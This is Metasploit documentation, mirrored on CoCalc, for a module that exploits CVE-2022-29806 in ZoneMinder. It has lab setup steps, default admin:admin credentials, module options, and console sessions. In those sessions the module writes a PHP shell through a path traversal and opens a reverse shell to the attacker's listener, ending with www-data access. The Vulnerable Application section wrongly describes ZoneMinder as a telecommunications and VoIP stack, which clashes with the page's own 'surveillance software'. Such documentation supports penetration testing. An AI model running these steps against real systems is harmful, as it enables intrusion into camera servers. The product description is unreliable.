CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
Views: 1904

Description

This module exploits an arbitrary file write chained with a path traversal in the debug log file option in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11

More about the vulnerability detail: CVE-2022-29806.

The module will automatically use php/reverse_perl payload.

The module will check if authentication is enabled but Zoneminder does not enable the authentication by default.

Vulnerable Application

Zoneminder is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.

This module has been tested successfully on Zoneminder versions:

  • 1.36.4~64bit on Ubuntu 18.04

  • 1.34.23~64bit on Debian 11.10

Source and Installers

Docker installation

docker run -d --rm -ti -p 1080:80 \
    -e TZ='Europe/London' \
    --shm-size="512m" \
    --name zoneminder \
    zoneminderhq/zoneminder:latest-ubuntu18.04

Navigate to http://172.17.0.2/zm/index.php?view=privacy and click APPLY to activate the dashboard

Enable authentication

To enable authentication for verification and scenarios, follow these steps:

  1. Navigate to http://172.17.0.2/zm/index.php?view=options

  2. Tick the OPT_USE_AUTH option and click save

  3. Login with the default password admin:admin

  4. Navigate to http://172.17.0.2/zm/index.php?view=options&tab=users and change the admin password

Verification Steps

  1. Do: use exploit/unix/webapp/zoneminder_lang_exec

  2. Do: set RHOSTS [ips]

  3. Do: set LHOST [lhost]

  4. Do: run

  5. You should get a shell.

Options

USERNAME

The ZoneMinder username (default: admin)

PASSWORD

The ZoneMinder password (default: admin)

Scenarios

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/rmdQiqoLFCsov.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:58932) at 2022-04-27 03:36:31 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker with authentication enabled

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set PASSWORD password
PASSWORD => password
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/Cn3PqXcN9VlAR98.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51944) at 2022-04-27 18:53:14 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Failed exploitation due to invalid credentials

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[-] Service found, but authentication failed
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Exploit completed, but no session was created.